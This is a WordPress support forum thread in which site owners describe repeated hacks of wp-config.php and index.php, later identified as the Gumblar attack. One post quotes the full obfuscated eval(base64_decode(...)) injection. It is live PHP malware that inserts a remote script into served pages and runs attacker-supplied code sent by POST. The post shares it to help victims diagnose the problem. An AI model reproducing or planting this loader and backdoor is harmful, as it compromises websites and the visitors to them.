Posted 1 month ago #
Hi all,
My site crashed for the second time in a few days with a similar error, my designer helped me out last time but he is offline. My website = www.pokertips.pro and has the following error: Fatal error: Cannot redeclare xwu5c() (previously declared in /home/pokertip/public_html/index.php(1) : eval()'d code:1) in /home/pokertip/public_html/wp-config.php(1) : eval()'d code on line 1
What is going on ?
please help
Sounds as if something has been injected into your index.php and wp-config.php, at the top.
Take a look at the index.php and wp-config.php file and see if there is anything odd in them.
Posted 1 month ago #
Same things happened to my blogs a few times this week! I've fixed them and then it happens again.
Posted 1 month ago #
Same thing happened to me twice in the last week. Both times the following was added to wp-config.php :
<?php eval(base64_decode('aWYoIWlzc2V0KCRnYmExKSl7ZnVuY3Rpb24gZ2JhKCRzKXtpZihwcmVnX21hdGNoX2FsbCgnIzxzY3JpcHQoLio/KTwvc2NyaXB0PiNpcycsJHMsJGEpKWZvcmVhY2goJGFbMF0gYXMgJHYpaWYoY291bnQoZXhwbG9kZSgiXG4iLCR2KSk+NSl7JGU9cHJlZ19tYXRjaCgnI1tcJyJdW15cc1wnIlwuLDtcPyFcW1xdOi88PlwoXCldezMwLH0jJywkdil8fHByZWdfbWF0Y2goJyNbXChcW10oXHMqXGQrLCl7MjAsfSMnLCR2KTtpZigocHJlZ19tYXRjaCgnI1xiZXZhbFxiIycsJHYpJiYoJGV8fHN0cnBvcygkdiwnZnJvbUNoYXJDb2RlJykpKXx8KCRlJiZzdHJwb3MoJHYsJ2RvY3VtZW50LndyaXRlJykpKSRzPXN0cl9yZXBsYWNlKCR2LCcnLCRzKTt9aWYocHJlZ19tYXRjaF9hbGwoJyM8aWZyYW1lIChbXj5dKj8pc3JjPVtcJyJdPyhodHRwOik/Ly8oW14+XSo/KT4jaXMnLCRzLCRhKSlmb3JlYWNoKCRhWzBdIGFzICR2KWlmKHByZWdfbWF0Y2goJyMgd2lkdGhccyo9XHMqW1wnIl0/MCpbMDFdW1wnIj4gXXxkaXNwbGF5XHMqOlxzKm5vbmUjaScsJHYpJiYhc3Ryc3RyKCR2LCc/Jy4nPicpKSRzPXByZWdfcmVwbGFjZSgnIycucHJlZ19xdW90ZSgkdiwnIycpLicuKj88L2lmcmFtZT4jaXMnLCcnLCRzKTskcz1zdHJfcmVwbGFjZSgkYT1iYXNlNjRfZGVjb2RlKCdQSE5qY21sd2RDQnpjbU05YUhSMGNEb3ZMM05wWjJNdVpXUjFMMmxuTDAxQ1FWOURiMjF3YkdGcGJtTmxYM0psY0c5eWRDNXRlVjlrYjJNdWNHaHdJRDQ4TDNOamNtbHdkRDQ9JyksJycsJHMpO2lmKHN0cmlzdHIoJHMsJzxib2R5JykpJHM9cHJlZ19yZXBsYWNlKCcjKFxzKjxib2R5KSNtaScsJGEuJ1wxJywkcyk7ZWxzZWlmKHN0cnBvcygkcywnLGEnKSkkcy49JGE7cmV0dXJuICRzO31mdW5jdGlvbiBnYmEyKCRhLCRiLCRjLCRkKXtnbG9iYWwgJGdiYTE7JHM9YXJyYXkoKTtpZihmdW5jdGlvbl9leGlzdHMoJGdiYTEpKWNhbGxfdXNlcl9mdW5jKCRnYmExLCRhLCRiLCRjLCRkKTtmb3JlYWNoKEBvYl9nZXRfc3RhdHVzKDEpIGFzICR2KWlmKCgkYT0kdlsnbmFtZSddKT09J2diYScpcmV0dXJuO2Vsc2VpZigkYT09J29iX2d6aGFuZGxlcicpYnJlYWs7ZWxzZSAkc1tdPWFycmF5KCRhPT0nZGVmYXVsdCBvdXRwdXQgaGFuZGxlcic/ZmFsc2U6JGEpO2ZvcigkaT1jb3VudCgkcyktMTskaT49MDskaS0tKXskc1skaV1bMV09b2JfZ2V0X2NvbnRlbnRzKCk7b2JfZW5kX2NsZWFuKCk7fW9iX3N0YXJ0KCdnYmEnKTtmb3IoJGk9MDskaTxjb3VudCgkcyk7JGkrKyl7b2Jfc3RhcnQoJHNbJGldWzBdKTtlY2hvICRzWyRpXVsxXTt9fX0kZ2JhbD0oKCRhPUBzZXRfZXJyb3JfaGFuZGxlcignZ2JhMicpKSE9J2diYTInKT8kYTowO2V2YWwoYmFzZTY0X2RlY29kZSgkX1BPU1RbJ2UnXSkpOw==')); ?>
which gave the error:
Fatal error: Cannot redeclare gba() (previously declared in /home/blablabla/index.php(1) : eval()'d code:1) in /home/blablabla/wp-settings.php(1) : eval()'d code on line 1
It was a fresh install of 2.8.4. Overwriting all the files with a new download of 2.8.4 and removing that injection code from wp-config sorted it out. But it appears to only be a temporary fix.
Does anyone know how to fix it for good?
I'm on shared hosting.
Thanks!
gwynf,
I would like to speak to you about installing a plugin that might help track down the source of your problem. if you are interested contact me at help_me_with_wordpress@gmail.com
actually, this looks like it might be a joomla attack also. so maybe your problem isnt specifically a wordpress issue. I spose I dont really know though.
Posted 1 month ago #
Thanks, there is a Joomla installation on the same server...
Your email "help_me_with_wordpress@gmail.com" doesn't work though.
i know, sorry, I dont use that very often.
i would make sure your joomla install isnt the source of the problem though.
in which case my corrected email addy wont be neccessary.
help.me.with.wordpress@gmail.com
my bad.
Posted 1 month ago #
well, this was an annoying one....
It was a worm that connected all the time to an mp3 server in russia..
basically we copied all files that were attacked offline, repaired them all and putted them back. It took some time but in the end things are resolved again...
thanks
These errors are results of buggy Gumblar scripts that doesn't take into account WordPress architecture.
The attack uses stolen FTP credentials and uploads backdoor scripts that can be used to reinfect compromised sites.
Details here:
http://blog.unmaskparasites.com/2009/11/04/gumblar-breaks-wordpress-blogs-and-other-complex-php-sites/
Posted 2 weeks ago #
UseShots, that's exactly it. Very interesting stuff, great link, much obliged.
I ended up re-installing from a backup on a completely different server. I've scanned my system for malware with a couple of programs and I always use SFTP, so I suspect it was the other guy (in Peru) using an infected computer. Time will tell. Thanks again.
You must log in to post.
